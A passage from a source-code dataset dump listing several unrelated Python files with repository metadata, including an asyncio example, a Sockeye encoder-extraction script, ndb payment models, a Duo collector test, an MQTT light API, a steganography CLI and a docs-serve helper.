\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"python/asyncio/tasks.py"},"max_issues_repo_name":{"kind":"string","value":"zeroam/TIL"},"max_issues_repo_head_hexsha":{"kind":"string","value":"43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"python/asyncio/tasks.py"},"max_forks_repo_name":{"kind":"string","value":"zeroam/TIL"},"max_forks_repo_head_hexsha":{"kind":"string","value":"43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1"},"max_forks_repo_licenses":{"kind":"list 
like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import asyncio\n\n\nasync def my_task(seconds):\n \"\"\"\n A task to do for a number of seconds\n \"\"\"\n print('This task is taking {} seconds to complete'.format(seconds))\n await asyncio.sleep(seconds)\n return 'task finished'\n\n\nif __name__ == '__main__':\n my_event_loop = asyncio.get_event_loop()\n try:\n print('task creation started')\n task_obj = my_event_loop.create_task(my_task(seconds=2))\n my_event_loop.run_until_complete(task_obj)\n finally:\n my_event_loop.close()\n\n print(\"The task's result was: {}\".format(task_obj.result()))"},"avg_line_length":{"kind":"number","value":26.3636363636,"string":"26.363636"},"max_line_length":{"kind":"number","value":71,"string":"71"},"alphanum_fraction":{"kind":"number","value":0.6689655172,"string":"0.668966"}}},{"rowIdx":46382,"cells":{"hexsha":{"kind":"string","value":"96050349c05924aa062803ddf5dd8d851a867f8b"},"size":{"kind":"number","value":5081,"string":"5,081"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py"},"max_stars_repo_name":{"kind":"string","value":"gopala-kr/ds-notebooks"},"max_stars_repo_head_hexsha":{"kind":"string","value":"bc35430ecdd851f2ceab8f2437eec4d77cb59423"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2019-05-10T09:16:23.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2019-05-10T09:16:23.000Z"},"max_issues_repo_path":{"kind":"string","value":"mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py"},"max_issues_repo_name":{"kind":"string","value":"gopala-kr/ds-notebooks"},"max_issues_repo_head_hexsha":{"kind":"string","value":"bc35430ecdd851f2ceab8f2437eec4d77cb59423"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py"},"max_forks_repo_name":{"kind":"string","value":"gopala-kr/ds-notebooks"},"max_forks_repo_head_hexsha":{"kind":"string","value":"bc35430ecdd851f2ceab8f2437eec4d77cb59423"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-10-14T07:30:18.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2019-10-14T07:30:18.000Z"},"content":{"kind":"string","value":"\"\"\"\nSimple Translate CLI\n\"\"\"\nfrom contextlib import ExitStack\n\nimport mxnet as mx\nimport sys\nimport argparse\nimport logging\nimport time\nimport sockeye.utils\nfrom sockeye.utils import acquire_gpu, get_num_gpus\nimport sockeye.data_io\nimport sockeye.arguments as arguments\nimport sockeye.inference\nimport re\nimport numpy as np\n\n\ndef main():\n \n params = argparse.ArgumentParser(description='Translate from STDIN to STDOUT')\n params.add_argument('--model-prefixes', '-m', required=False, nargs='+',\n help='model prefix(es). 
Use multiple for ensemble decoding. ' +\n 'Model prefix determines config, best epoch params and vocab files.')\n params.add_argument('--epochs', '-e', required=False, default=None, type=int, nargs='+',\n help='If not given, chooses best epochs/checkpoints for each model. If specified, must have the same ' +\n 'length as --model-prefix and be integer')\n\n params.add_argument('--max-input-len', '-n', type=int, default=None,\n help='Maximum sentence length. Default: value from trained model(s).')\n params.add_argument('--output-type', default='translation', choices=[\"translation\", \"align_plot\", \"align_text\"],\n help='Either print the translation or visualize the alignment. Default: translation')\n params.add_argument('--align-plot-prefix', default=\"align\",\n help='Prefix used when plotting the alignment.')\n params.add_argument('--log-level', default=logging.INFO, type=int,\n choices=[logging.INFO, logging.WARN, logging.DEBUG])\n params.add_argument('--beam-size', '-b', type=int, default=1, help='beam size. If == 1, greedy decode')\n params.add_argument('--ensemble-mode', type=str, default='linear', choices=['linear', 'log_linear'],\n help='Ensemble mode: linear or log-linear interpolation of model predictions. Default: linear')\n params.add_argument('--softmax-temperature', type=float, default=None, required=False,\n help='Controls peakiness of model predictions. 
Values < 1.0 produce peaked predictions, ' +\n 'values > 1.0 produce smoothed distributions.')\n params = arguments.add_device_args(params)\n args = params.parse_args()\n\n args.model_prefixes = ['model/']\n assert args.beam_size > 0, \"Beam size must be 1 or greater.\"\n if args.epochs is not None:\n assert len(args.epochs) == len(args.model_prefixes), \"must provide epochs for each model\"\n\n #sockeye.utils.setup_logging(args.log_level)\n logging.basicConfig(filename='test.log', level=logging.INFO)\n \n logging.info(\"Command: %s\", \" \".join(sys.argv))\n logging.info(\"Arguments: %s\", args)\n\n with ExitStack() as exit_stack:\n if args.use_cpu:\n context = mx.cpu()\n else:\n num_gpus = get_num_gpus()\n assert num_gpus > 0, \"No GPUs found, consider running on the CPU with --use-cpu \" \\\n \"(note: check depends on nvidia-smi and this could also mean that the nvidia-smi \" \\\n \"binary isn't on the path).\"\n assert len(args.device_ids) == 1, \"cannot run on multiple devices for now\"\n gpu_id = args.device_ids[0]\n if gpu_id < 0:\n # get an automatic gpu id:\n gpu_id = exit_stack.enter_context(acquire_gpu())\n context = mx.gpu(gpu_id)\n\n translator = sockeye.inference.Translator(context,\n args.ensemble_mode,\n *sockeye.inference.load_models(context,\n args.max_input_len,\n args.beam_size,\n args.model_prefixes,\n args.epochs,\n args.softmax_temperature))\n ############ CHANGE HERE ########################\n sample_file = open('train_question_token.txt','r')\n encoder_file = open('train_question_encoder.txt', \"w\")\n #################################################\n \n for i, line in enumerate(sample_file,1):\n trans_input = translator.make_input(i,line)\n source, source_length, bucket_key = translator._get_inference_input(trans_input.tokens)\n encoded_source, _ , _ , _, _ = translator.models[0].run_encoder(source, source_length, bucket_key)\n last_slice_source = mx.ndarray.mean(encoded_source, axis=1, keepdims=True)\n last_slice_source = 
last_slice_source.reshape((-1,))\n encoder_file.write(\" \".join(map(str, last_slice_source.asnumpy()))+\"\\n\")\n\n encoder_file.close()\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":51.8469387755,"string":"51.846939"},"max_line_length":{"kind":"number","value":128,"string":"128"},"alphanum_fraction":{"kind":"number","value":0.5711474119,"string":"0.571147"}}},{"rowIdx":46383,"cells":{"hexsha":{"kind":"string","value":"7dc2a90ba4547195588f251869e654e8a1c3535b"},"size":{"kind":"number","value":2552,"string":"2,552"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"plugins/tff_backend/models/payment.py"},"max_stars_repo_name":{"kind":"string","value":"threefoldfoundation/app_backend"},"max_stars_repo_head_hexsha":{"kind":"string","value":"b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"plugins/tff_backend/models/payment.py"},"max_issues_repo_name":{"kind":"string","value":"threefoldfoundation/app_backend"},"max_issues_repo_head_hexsha":{"kind":"string","value":"b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n 
\"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":178,"string":"178"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2017-08-02T12:58:06.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2017-12-20T15:01:12.000Z"},"max_forks_repo_path":{"kind":"string","value":"plugins/tff_backend/models/payment.py"},"max_forks_repo_name":{"kind":"string","value":"threefoldfoundation/app_backend"},"max_forks_repo_head_hexsha":{"kind":"string","value":"b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":2,"string":"2"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2018-01-10T10:43:12.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2018-03-18T10:42:23.000Z"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# Copyright 2017 GIG Technology NV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# @@license_version:1.3@@\n\nfrom google.appengine.ext import ndb\n\nfrom framework.models.common import NdbModel\nfrom plugins.tff_backend.plugin_consts import NAMESPACE\n\n\nclass ThreeFoldBaseTransaction(NdbModel):\n NAMESPACE = NAMESPACE\n timestamp = ndb.IntegerProperty()\n unlock_timestamps = ndb.IntegerProperty(repeated=True, indexed=False) # type: list[int]\n unlock_amounts = ndb.IntegerProperty(repeated=True, indexed=False) # 
type: list[int]\n token = ndb.StringProperty()\n token_type = ndb.StringProperty()\n amount = ndb.IntegerProperty()\n precision = ndb.IntegerProperty(default=2)\n memo = ndb.StringProperty()\n usernames = ndb.StringProperty(repeated=True)\n from_username = ndb.StringProperty()\n to_username = ndb.StringProperty()\n\n\nclass ThreeFoldTransaction(ThreeFoldBaseTransaction):\n amount_left = ndb.IntegerProperty()\n fully_spent = ndb.BooleanProperty()\n height = ndb.IntegerProperty()\n\n @property\n def id(self):\n return self.key.id()\n\n @classmethod\n def create_new(cls):\n return cls(namespace=NAMESPACE)\n\n @classmethod\n def list_with_amount_left(cls, username):\n return cls.query() \\\n .filter(cls.to_username == username) \\\n .filter(cls.fully_spent == False) \\\n .order(-cls.timestamp) # noQA\n\n\nclass ThreeFoldPendingTransaction(ThreeFoldBaseTransaction):\n STATUS_PENDING = u'pending'\n STATUS_CONFIRMED = u'confirmed'\n STATUS_FAILED = u'failed'\n\n synced = ndb.BooleanProperty()\n synced_status = ndb.StringProperty()\n\n @property\n def id(self):\n return self.key.string_id().decode('utf8')\n\n @classmethod\n def create_key(cls, transaction_id):\n return ndb.Key(cls, u\"%s\" % transaction_id, namespace=NAMESPACE)\n\n @classmethod\n def list_by_user(cls, username):\n return cls.query() \\\n .filter(cls.usernames == username) \\\n 
.order(-cls.timestamp)\n"},"avg_line_length":{"kind":"number","value":31.5061728395,"string":"31.506173"},"max_line_length":{"kind":"number","value":92,"string":"92"},"alphanum_fraction":{"kind":"number","value":0.704153605,"string":"0.704154"}}},{"rowIdx":46384,"cells":{"hexsha":{"kind":"string","value":"4858b0ab221bd6fcbedef2394043bc190ecf5a5e"},"size":{"kind":"number","value":983,"string":"983"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py"},"max_stars_repo_name":{"kind":"string","value":"jrauen/content"},"max_stars_repo_head_hexsha":{"kind":"string","value":"81a92be1cbb053a5f26a6f325eff3afc0ca840e0"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py"},"max_issues_repo_name":{"kind":"string","value":"jrauen/content"},"max_issues_repo_head_hexsha":{"kind":"string","value":"81a92be1cbb053a5f26a6f325eff3afc0ca840e0"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":40,"string":"40"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2022-03-03T07:34:00.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-31T07:38:35.000Z"},"max_forks_repo_path":{"kind":"string","value":"Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py"},"max_forks_repo_name":{"kind":"string","value":"jrauen/content"},"max_forks_repo_head_hexsha":{"kind":"string","value":"81a92be1cbb053a5f26a6f325eff3afc0ca840e0"},"max_forks_repo_licenses":{"kind":"list 
like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from DuoEventCollector import Client, GetEvents, LogType, Params\n\ndemisto_params = {'after': '1 month', 'host': 'api-a1fdb00d.duosecurity.com', 'integration_key': 'DI47EXXXXXXXWRYV2',\n 'limit': '5', 'proxy': False, 'retries': '5', 'secret_key': {'password': 'YK6mtSzXXXXXXXXXXX',\n 'passwordChanged': False}}\ndemisto_params['params'] = Params(**demisto_params, mintime={})\nclient = Client(demisto_params)\nget_events = GetEvents(client=client, request_order=[LogType.AUTHENTICATION, LogType.ADMINISTRATION, LogType.TELEPHONY])\n\n\ndef test_rotate_request_order():\n get_events.rotate_request_order()\n assert get_events.request_order == [LogType.ADMINISTRATION, LogType.TELEPHONY, LogType.AUTHENTICATION]\n get_events.rotate_request_order()\n get_events.rotate_request_order()\n assert get_events.request_order == [LogType.AUTHENTICATION, LogType.ADMINISTRATION, LogType.TELEPHONY]\n"},"avg_line_length":{"kind":"number","value":57.8235294118,"string":"57.823529"},"max_line_length":{"kind":"number","value":120,"string":"120"},"alphanum_fraction":{"kind":"number","value":0.6998982706,"string":"0.699898"}}},{"rowIdx":46385,"cells":{"hexsha":{"kind":"string","value":"d21059497ff56cda89a8d1b389c15c04c01fa702"},"size":{"kind":"number","value":2773,"string":"2,773"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"src/api/light.py"},"max_stars_repo_name":{"kind":"string","value":"th-koeln-intia/ip-sprachassistent-team1"},"max_stars_repo_head_hexsha":{"kind":"string","value":"69fbc06a326da91fd3d84f222eba6cd2b1a79975"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-04-28T09:45:34.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-04-28T09:45:34.000Z"},"max_issues_repo_path":{"kind":"string","value":"src/api/light.py"},"max_issues_repo_name":{"kind":"string","value":"th-koeln-intia/ip-sprachassistent-team1"},"max_issues_repo_head_hexsha":{"kind":"string","value":"69fbc06a326da91fd3d84f222eba6cd2b1a79975"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":1,"string":"1"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2020-09-24T07:20:16.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2020-09-24T07:20:16.000Z"},"max_forks_repo_path":{"kind":"string","value":"src/api/light.py"},"max_forks_repo_name":{"kind":"string","value":"th-koeln-intia/ip-sprachassistent-team1"},"max_forks_repo_head_hexsha":{"kind":"string","value":"69fbc06a326da91fd3d84f222eba6cd2b1a79975"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-12-04T13:38:33.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2020-12-04T13:38:33.000Z"},"content":{"kind":"string","value":"from api.app import app\nfrom api import MQTT_HOST, MQTT_PORT\nfrom flask import request, Response, jsonify\nimport json \nimport paho.mqtt.publish as publish\nfrom json import JSONDecoder, JSONEncoder\n\n \n@app.route('/light/set', methods=['POST'])\ndef set_light():\n body = request.get_json()\n if body is None or 'friendly_name' not in body or 'payload' not in body:\n return jsonify({\"error\": \"BAD_REQUEST\"}), 400\n else:\n publish_set(body['friendly_name'], json.dumps(body['payload'])) \n 
publish_feedback(json.dumps(body['feedback']))\n return json.dumps(body), 200\n\n\n@app.route('/light/set/raw', methods=['POST'])\ndef set_light_raw():\n body = request.get_json()\n if body is None:\n return jsonify({\"error\": \"BAD_REQUEST\"}), 400\n friendly_name = get_friendly_name_from_rhasspy_intent(body)\n payload = create_payload_from_rhasspy_intent(body)\n publish_set(friendly_name, json.dumps(payload))\n raw_text = get_raw_text_as_payload(body)\n publish_feedback(json.dumps(raw_text))\n return json.dumps(body), 200\n\n\ndef create_payload_from_rhasspy_intent(dict):\n entities = dict.get('entities', None)\n if entities is None:\n return None\n state = next((x for x in entities if x['entity'] == 'state'), None)\n brightness = next((x for x in entities if x['entity'] == 'brightness'), None)\n color = next((x for x in entities if x['entity'] == 'color'), None)\n payload = {}\n if state is not None and 'value' in state:\n payload['state'] = state['value']\n if brightness is not None and 'value' in brightness:\n payload['brightness'] = brightness['value']\n if color is not None and 'value' in color:\n payload['color'] = color['value']\n return payload\n\n\ndef get_friendly_name_from_rhasspy_intent(dict):\n entities = dict.get('entities', None)\n if entities is None:\n return None\n room = next((e for e in entities if e['entity'] == 'room'), None)\n return room.get('value', None)\n\n\ndef publish_set(friendly_name, payload):\n topic = 'zigbee2mqtt/' + friendly_name + '/set'\n publish.single(topic, payload, hostname=MQTT_HOST, port=MQTT_PORT)\n\n\ndef publish_feedback(payload):\n topic = 'hermes/tts/say'\n publish.single(topic, payload, hostname=MQTT_HOST, port=MQTT_PORT)\n\n\ndef get_raw_value_from_room_entity(dict):\n entities = dict.get('entities', None)\n if entities is None:\n return None\n room = next((e for e in entities if e['entity'] == 'room'), None)\n\n return room.get('raw_value', None)\n\ndef get_raw_text_as_payload(dict):\n payload = {}\n 
payload['text'] = dict.get('raw_text', None)\n if(payload['text'] is not None):\n payload['text'] = 'Okay, ' + payload['text']\n print(json.dumps(payload))\n return payload"},"avg_line_length":{"kind":"number","value":33.8170731707,"string":"33.817073"},"max_line_length":{"kind":"number","value":81,"string":"81"},"alphanum_fraction":{"kind":"number","value":0.6736386585,"string":"0.673639"}}},{"rowIdx":46386,"cells":{"hexsha":{"kind":"string","value":"d27ffe7a1e06854e2ba699eea5d81dfb4945c148"},"size":{"kind":"number","value":1901,"string":"1,901"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Steg2.py"},"max_stars_repo_name":{"kind":"string","value":"Han-Lon/Steganosimple-Cryptor"},"max_stars_repo_head_hexsha":{"kind":"string","value":"8fb10993d51250fdfe25f02311f7143af21e8085"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"Steg2.py"},"max_issues_repo_name":{"kind":"string","value":"Han-Lon/Steganosimple-Cryptor"},"max_issues_repo_head_hexsha":{"kind":"string","value":"8fb10993d51250fdfe25f02311f7143af21e8085"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Steg2.py"},"max_forks_repo_name":{"kind":"string","value":"Han-Lon/Steganosimple-Cryptor"},"max_forks_repo_head_hexsha":{"kind":"string","value":"8fb10993d51250fdfe25f02311f7143af21e8085"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from stegano import lsb\nfrom tkinter import filedialog\n\n\n# A personal project to test out some Steganography functions. Steganography involves hiding data inside\n# image files (e.g. in the buffer, in unused bits, etc) without altering the physical appearance of the image at all.\n\n\n# Hide a message into an image using LSB method, and designate an output\ndef hide(message, image, output):\n secret = lsb.hide(image, message)\n secret.save(output)\n\n\n# Reveal a message hidden in an image that was hidden using LSB method. Handles errors for if image\n# doesn't have a message hidden within it.\ndef reveal(image):\n try:\n revealed = str.encode(lsb.reveal(image))\n revealedfinal = str(revealed, encoding='utf-8')\n return revealedfinal\n except TypeError:\n print('ERROR! Image doesn\\'t seem to have any hidden message.')\n\n\nif __name__ == '__main__':\n looper = True\n while looper:\n # Logic for interacting with the program in a CLI manner\n operation = input('Enter an operation - 1. Hide 2. Reveal \\n')\n if operation == '1':\n print('Hide data option selected...')\n # Time to hide data in an image file\n message = input('\\n Enter a message! 
\\n')\n img_input = filedialog.askopenfilename()\n temp_path = img_input.split('.')\n output_path = temp_path[0] + '1' + '.png'\n hide(message, img_input, output_path)\n print('Message has been hidden in {}'.format(output_path))\n elif operation == '2':\n # Time to pull data hidden in an image file\n print('Reveal data option selected...')\n img_input = filedialog.askopenfilename()\n output = reveal(img_input)\n print('Data hidden in the image file: {}'.format(output))\n else:\n # Exit the function\n looper = False\n break\n\n"},"avg_line_length":{"kind":"number","value":37.2745098039,"string":"37.27451"},"max_line_length":{"kind":"number","value":117,"string":"117"},"alphanum_fraction":{"kind":"number","value":0.6349289847,"string":"0.634929"}}},{"rowIdx":46387,"cells":{"hexsha":{"kind":"string","value":"96714247c993e41c5762d3e61ed42c474feb4d08"},"size":{"kind":"number","value":2136,"string":"2,136"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":".arch/plugins/doc_lcdoc/serve.py"},"max_stars_repo_name":{"kind":"string","value":"axiros/docutools"},"max_stars_repo_head_hexsha":{"kind":"string","value":"f99874a64afba8f5bc740049d843151ccd9ceaf7"},"max_stars_repo_licenses":{"kind":"list like","value":["BSD-2-Clause"],"string":"[\n \"BSD-2-Clause\"\n]"},"max_stars_count":{"kind":"number","value":24,"string":"24"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-04T22:11:59.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-02-02T21:51:43.000Z"},"max_issues_repo_path":{"kind":"string","value":".arch/plugins/doc_lcdoc/serve.py"},"max_issues_repo_name":{"kind":"string","value":"axiros/docutools"},"max_issues_repo_head_hexsha":{"kind":"string","value":"f99874a64afba8f5bc740049d843151ccd9ceaf7"},"max_issues_repo_licenses":{"kind":"list like","value":["BSD-2-Clause"],"string":"[\n 
\"BSD-2-Clause\"\n]"},"max_issues_count":{"kind":"number","value":2,"string":"2"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-04T21:51:30.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2021-10-05T14:15:31.000Z"},"max_forks_repo_path":{"kind":"string","value":".arch/plugins/doc_lcdoc/serve.py"},"max_forks_repo_name":{"kind":"string","value":"axiros/docutools"},"max_forks_repo_head_hexsha":{"kind":"string","value":"f99874a64afba8f5bc740049d843151ccd9ceaf7"},"max_forks_repo_licenses":{"kind":"list like","value":["BSD-2-Clause"],"string":"[\n \"BSD-2-Clause\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/env python\n\"\"\"\n`doc serve` is a convenience tool which starts the live server together with doc pre_process\n\n(with working but changeable defaults)\n\nNote: You have to run this from the repo root of a checked out devapp project, which has a docs folder.\n\n\n\"\"\"\nfrom devapp.tools import FLG, exists\nfrom devapp.app import app, do, system, run_app\nimport os, sys, json\nimport time\n\n# ------------------------------------------------------------------------------ config\n\nfrom . import pre_process # import lit_prog_evaluation\n\n\nclass Flags:\n autoshort = ''\n\n class lit_prog_evaluation(pre_process.Flags.lit_prog_evaluation):\n 'Example: re-evaluate only page config.md.lp: doc serve -lpe conf'\n d = 'md'\n\n class pre_proc:\n n = 'How to run doc pre_process'\n\n class port:\n n = 'mkdocs live server port. if the port is occupied (checked via netstat) we kill(!) 
the occupying other process'\n d = 8000\n\n class only_kill:\n n = 'Action: Only kill server at port'\n d = False\n\n\n# ----------------------------------------------------------------------------- actions\n\n\ndef kill_server():\n p = FLG.port\n cmd = 'netstat -tanp | grep \" LISTEN \" | grep \":%s\"' % p\n res = os.popen(cmd).read().strip().split()\n if not res:\n return app.warn('No server process was running at port', port=p)\n app.warn('Killing', proc=res)\n proc = res[-1].split('/', 1)[0]\n do(os.kill, int(proc), 9)\n app.warn('Server process at port killed', port=p)\n\n\ndef start_server():\n do(kill_server)\n cmd = 'mkdocs serve --livereload -a 127.0.0.1:%s &' % FLG.port\n do(system, cmd)\n\n\ndef start_doc_preproc():\n cmd = 'doc pre_process --lit_prog_evaluation=%s --lit_prog_evaluation_monitor=true'\n cmd = cmd % FLG.lit_prog_evaluation\n do(system, cmd)\n\n\ndef run():\n if FLG.only_kill:\n return do(kill_server)\n\n D = os.getcwd()\n if not exists(D + '/docs/'):\n app.die('You have to run doc serve within the repo root of a devapps checkout')\n do(start_server)\n p = FLG.port\n do(start_doc_preproc)\n\n\nmain = lambda: run_app(run, flags=Flags)\n"},"avg_line_length":{"kind":"number","value":26.7,"string":"26.7"},"max_line_length":{"kind":"number","value":123,"string":"123"},"alphanum_fraction":{"kind":"number","value":0.6062734082,"string":"0.606273"}}},{"rowIdx":46388,"cells":{"hexsha":{"kind":"string","value":"fb595e128f019ae4e13c45fab11da4f05a338717"},"size":{"kind":"number","value":1016,"string":"1,016"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"retro/enums.py"},"max_stars_repo_name":{"kind":"string","value":"MatPoliquin/retro"},"max_stars_repo_head_hexsha":{"kind":"string","value":"c70c174a9818d1e97bc36e61abb4694d28fc68e1"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT-0","MIT"],"string":"[\n \"MIT-0\",\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"number","value":2706,"string":"2,706"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-04-05T18:28:50.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-29T16:56:59.000Z"},"max_issues_repo_path":{"kind":"string","value":"retro/enums.py"},"max_issues_repo_name":{"kind":"string","value":"MatPoliquin/retro"},"max_issues_repo_head_hexsha":{"kind":"string","value":"c70c174a9818d1e97bc36e61abb4694d28fc68e1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT-0","MIT"],"string":"[\n \"MIT-0\",\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":242,"string":"242"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2018-04-05T22:30:42.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-19T01:55:11.000Z"},"max_forks_repo_path":{"kind":"string","value":"retro/enums.py"},"max_forks_repo_name":{"kind":"string","value":"MatPoliquin/retro"},"max_forks_repo_head_hexsha":{"kind":"string","value":"c70c174a9818d1e97bc36e61abb4694d28fc68e1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT-0","MIT"],"string":"[\n \"MIT-0\",\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":464,"string":"464"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2018-04-05T19:10:34.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-28T13:33:32.000Z"},"content":{"kind":"string","value":"from enum import Enum\n\n\nclass State(Enum):\n \"\"\"\n Special values for setting the restart state of the environment. 
